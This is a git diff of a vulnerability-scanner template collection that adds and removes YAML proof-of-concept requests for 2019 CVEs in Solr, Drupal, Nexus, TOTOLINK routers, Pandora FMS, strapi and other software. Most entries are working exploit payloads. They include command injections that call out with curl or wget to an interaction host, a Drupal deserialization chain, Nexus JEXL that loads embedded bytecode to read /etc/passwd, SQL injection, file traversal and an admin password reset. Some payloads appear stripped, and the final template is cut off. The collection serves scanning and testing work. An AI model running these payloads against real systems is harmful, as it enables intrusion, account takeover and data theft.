a/poc/cve/cve-2019-17418-3981.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2019-17418 -info: - name: MetInfo 7.0 - SQL Injection - author: ritikchaddha - severity: high - description: An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-17418 - - https://github.com/evi1code/Just-for-fun/issues/2 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2019-17418 - cwe-id: CWE-89 - tags: metinfo,sqli,cve,cve2019 -requests: - - method: GET - path: - - "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin" - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "43865094559" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-17558.yaml b/poc/cve/cve-2019-17558.yaml new file mode 100644 index 0000000000..6009bff30d --- /dev/null +++ b/poc/cve/cve-2019-17558.yaml @@ -0,0 +1,74 @@ +id: CVE-2019-17558 + +info: + name: Apache Solr <=8.3.1 - Remote Code Execution + author: pikpikcu,madrobot + severity: high + description: Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user). + remediation: | + Upgrade to a patched version of Apache Solr (8.4.0 or later) to mitigate this vulnerability. + reference: + - https://issues.apache.org/jira/browse/SOLR-13971 + - https://nvd.nist.gov/vuln/detail/CVE-2019-17558 + - https://lists.apache.org/thread.html/rb964fe5c4e3fc05f75e8f74bf6b885f456b7a7750c36e9a8045c627a@%3Cissues.lucene.apache.org%3E + - http://packetstormsecurity.com/files/157078/Apache-Solr-8.3.0-Velocity-Template-Remote-Code-Execution.html + - https://lists.apache.org/thread.html/r0b7b9d4113e6ec1ae1d3d0898c645f758511107ea44f0f3a1210c5d5@%3Cissues.lucene.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2019-17558 + cwe-id: CWE-74 + epss-score: 0.97507 + epss-percentile: 0.9998 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: apache + product: solr + tags: kev,packetstorm,cve,cve2019,apache,rce,solr,oast + +http: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + - | + POST /solr/{{core}}/config HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } + } + - | + GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 + Host: {{Hostname}} + Connection: close + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + internal: true + +# digest: 4b0a00483046022100d95ae2fde11c073cfb8300dbe88398c8516603bb4a679c01eadd13c285c3934c02210095bb54e1c435ffb3f579c033627a1769da0f8a3db882b32e06bbf44deea77ba3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cve-2019-18394.yaml b/poc/cve/cve-2019-18394.yaml new file mode 100644 index 0000000000..2d4a346a78 --- /dev/null +++ b/poc/cve/cve-2019-18394.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-18394 + +info: + name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery + author: pdteam + severity: critical + description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery. + remediation: | + Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability. + reference: + - https://swarm.ptsecurity.com/openfire-admin-console/ + - https://github.com/igniterealtime/Openfire/pull/1497 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18394 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-18394 + cwe-id: CWE-918 + epss-score: 0.62096 + epss-percentile: 0.97508 + cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: igniterealtime + product: openfire + tags: cve,cve2019,ssrf,openfire,oast + +http: + - method: GET + path: + - "{{BaseURL}}/getFavicon?host=http://oast.fun/" + + matchers: + - type: dsl + dsl: + - "contains(body, 'Interactsh Server')" + - status_code == 200 + condition: and +# digest: 490a00463044021f6d7e17f12fe0eb1730678df5edf2c67e717ec04d9aa5a6dfbb92db8b070e2f022100ad3ee2b55fe5ed29b216985b0573dfc038ab42a6df84cdbed73538e789bb33a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-18665(1).yaml b/poc/cve/cve-2019-18665(1).yaml new file mode 100644 index 0000000000..36b4018e5a --- /dev/null +++ b/poc/cve/cve-2019-18665(1).yaml @@ -0,0 +1,30 @@ +id: CVE-2019-18665 +info: + name: DOMOS 5.5 - Directory Traversal + author: 0x_Akoko + severity: high + description: | + The Log module in SECUDOS DOMOS before 5.6 allows local file inclusion. + reference: + - https://atomic111.github.io/article/secudos-domos-directory_traversal + - https://vuldb.com/?id.144804 + - https://www.cvedetails.com/cve/CVE-2019-18665 + - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18665 + cwe-id: CWE-22 + tags: cve,cve2019,domos,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-18818-4021.yaml b/poc/cve/cve-2019-18818-4021.yaml new file mode 100644 index 0000000000..5ec5e8c48c --- /dev/null +++ b/poc/cve/cve-2019-18818-4021.yaml @@ -0,0 +1,52 @@ +id: CVE-2019-18818 + +info: + name: strapi CMS Unauthenticated Admin Password Reset + author: idealphase + severity: critical + description: "strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js." + reference: + - https://github.com/advisories/GHSA-6xc2-mj39-q599 + - https://www.exploit-db.com/exploits/50239 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18818 + cwe-id: CWE-640 + tags: cve,cve2019,strapi,auth-bypass,intrusive + +requests: + - raw: + - | + POST /admin/auth/reset-password HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + condition: and + words: + - '"username":' + - '"email":' + - '"jwt":' + part: body + + extractors: + - type: json + json: + - .user.username + - .user.email + +# Enhanced by mp on 2022/04/01 diff --git a/poc/cve/cve-2019-19368.yaml b/poc/cve/cve-2019-19368.yaml new file mode 100644 index 0000000000..f97048a1df --- /dev/null +++ b/poc/cve/cve-2019-19368.yaml @@ -0,0 +1,44 @@ +id: CVE-2019-19368 + +info: + name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting + author: madrobot + severity: medium + description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript. + remediation: | + Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://github.com/harshit-shukla/CVE-2019-19368/ + - https://www.maxum.com/Rumpus/Download.html + - http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-19368 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-19368 + cwe-id: CWE-79 + epss-score: 0.00624 + epss-percentile: 0.76551 + cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: maxum + product: rumpus + tags: xss,ftp,packetstorm,cve,cve2019 + +http: + - method: GET + path: + - "{{BaseURL}}/Login?!'>" + + - type: status + status: + - 200 +# digest: 4a0a0047304502206b4916cb37410f9d508ca5012166ced4ae59bad9438ce966b4a00ebf85f0e522022100b73f97f82af6a160dc96df7f314bca674dff1a61b711252ad9e79f5ea602f622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-19824-4053.yaml b/poc/cve/cve-2019-19824-4053.yaml deleted file mode 100644 index 6ae24e6e21..0000000000 --- a/poc/cve/cve-2019-19824-4053.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-19824 - -info: - name: TOTOLINK - Remote Code Execution - author: gy741 - severity: high - description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. - reference: - - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 - - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-19824 - cwe-id: CWE-78 - tags: cve,cve2019,totolink,rce,router - -requests: - - raw: - - | - POST /boafrm/formSysCmd HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46cGFzc3dvcmQ= - Content-Type: application/x-www-form-urlencoded - - submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/poc/cve/cve-2019-20210(1).yaml b/poc/cve/cve-2019-20210(1).yaml deleted file mode 100644 index 43994e7cf1..0000000000 --- a/poc/cve/cve-2019-20210(1).yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2019-20210 -info: - name: CTHthemes CityBook < 2.3.4 - Reflected XSS - author: edoardottt - severity: medium - description: | - The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query. - reference: - - https://wpscan.com/vulnerability/10013 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 - - https://wpvulndb.com/vulnerabilities/10018 - - https://cxsecurity.com/issue/WLB-2019120112 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-20210 - cwe-id: CWE-79 - tags: cve,cve2019,wordpress,citybook,xss,wp-theme -requests: - - method: GET - path: - - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "/wp-content/themes/citybook" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-20224(1).yaml b/poc/cve/cve-2019-20224(1).yaml deleted file mode 100644 index b7a2d0559b..0000000000 --- a/poc/cve/cve-2019-20224(1).yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2019-20224 -info: - name: Pandora FMS 7.0NG - Remote Command Injection - author: ritikchaddha - severity: high - description: | - Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. - reference: - - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-20224 - cwe-id: CWE-78 - tags: pandorafms,rce,cve,cve2019,authenticated,oast -requests: - - raw: - - | - POST /pandora_console/index.php?login=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - nick=admin&pass=admin&login_button=Login - - | - POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - cookie-reuse: true - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "http" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/17 diff --git a/poc/cve/cve-2019-20933(1).yaml b/poc/cve/cve-2019-20933(1).yaml new file mode 100644 index 0000000000..c690a67121 --- /dev/null +++ b/poc/cve/cve-2019-20933(1).yaml @@ -0,0 +1,32 @@ +id: CVE-2019-20933 +info: + name: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret + author: c-sh0 + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + - https://github.com/influxdata/influxdb/issues/12927 + - https://github.com/c-sh0/security/blob/master/influxdb.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-20933 + cwe-id: CWE-287 + tags: cve,cve-2019,influxdb,auth-bypass +requests: + - method: GET + path: + - "{{BaseURL}}/query?q=SHOW%20DATABASES" + headers: + Authorization: Bearer {{token}} + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"results":' + - '"name":"databases"' + condition: and diff --git a/poc/cve/cve-2019-2616(1).yaml b/poc/cve/cve-2019-2616(1).yaml deleted file mode 100644 index f6c8aa1ffb..0000000000 --- a/poc/cve/cve-2019-2616(1).yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-2616 -info: - name: XXE in Oracle Business Intelligence and XML Publisher - author: pdteam - severity: high - description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - - https://www.exploit-db.com/exploits/46729 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cve-id: CVE-2019-2616 - tags: cve,cve2019,oracle,xxe,oast,kev -requests: - - raw: - - | - POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Type: text/xml; charset=UTF-8 - - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/poc/cve/cve-2019-2767-4117.yaml b/poc/cve/cve-2019-2767-4117.yaml deleted file mode 100644 index bf1dcb703f..0000000000 --- a/poc/cve/cve-2019-2767-4117.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2019-2767 - -info: - name: Oracle Business Intelligence - Publisher XXE - author: madrobot - severity: high - description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - - https://www.exploit-db.com/exploits/46729 - tags: cve,cve2019,oracle,xxe,oast - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.20 - cve-id: CVE-2019-2767 - -requests: - - raw: - - | - GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/poc/cve/cve-2019-6340(1).yaml b/poc/cve/cve-2019-6340(1).yaml new file mode 100644 index 0000000000..e6d6680309 --- /dev/null +++ b/poc/cve/cve-2019-6340(1).yaml @@ -0,0 +1,34 @@ +id: CVE-2019-6340 +info: + name: Drupal 8 core RESTful Web Services RCE + author: madrobot + severity: high + description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-6340 + - https://www.drupal.org/sa-core-2019-003 + - http://web.archive.org/web/20210125004201/https://www.securityfocus.com/bid/107106/ + - https://www.synology.com/security/advisory/Synology_SA_19_09 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2019-6340 + cwe-id: CWE-502 + tags: cve,cve2019,drupal,rce,kev +requests: + - method: POST + path: + - '{{BaseURL}}/node/1?_format=hal_json' + body: '{ "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } }' + matchers-condition: and + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-7238-4207.yaml b/poc/cve/cve-2019-7238-4207.yaml new file mode 100644 index 0000000000..e6d8c9427e --- /dev/null +++ b/poc/cve/cve-2019-7238-4207.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-7238 + +info: + name: NEXUS < 3.14.0 Remote Code Execution + author: pikpikcu + severity: critical + tags: cve,cve2019,nexus,rce + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 + - https://github.com/jas502n/CVE-2019-7238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-7238 + description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control." + +requests: + - raw: + - | + POST /service/extdirect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-Requested-With: XMLHttpRequest + + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} + + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-7609-4233.yaml b/poc/cve/cve-2019-7609-4233.yaml new file mode 100644 index 0000000000..dc14d4219e --- /dev/null +++ b/poc/cve/cve-2019-7609-4233.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-7609 +info: + name: Kibana Timelion Arbitrary Code Execution + author: dwisiswant0 + severity: critical + description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + reference: + - https://github.com/mpgn/CVE-2019-7609 + - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 + tags: cve,cve2019,kibana,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-7609 + cwe-id: CWE-94 +requests: + - method: POST + path: + - "{{BaseURL}}/api/timelion/run" + headers: + Content-Type: "application/json; charset=utf-8" + body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + matchers-condition: and + matchers: + - type: word + 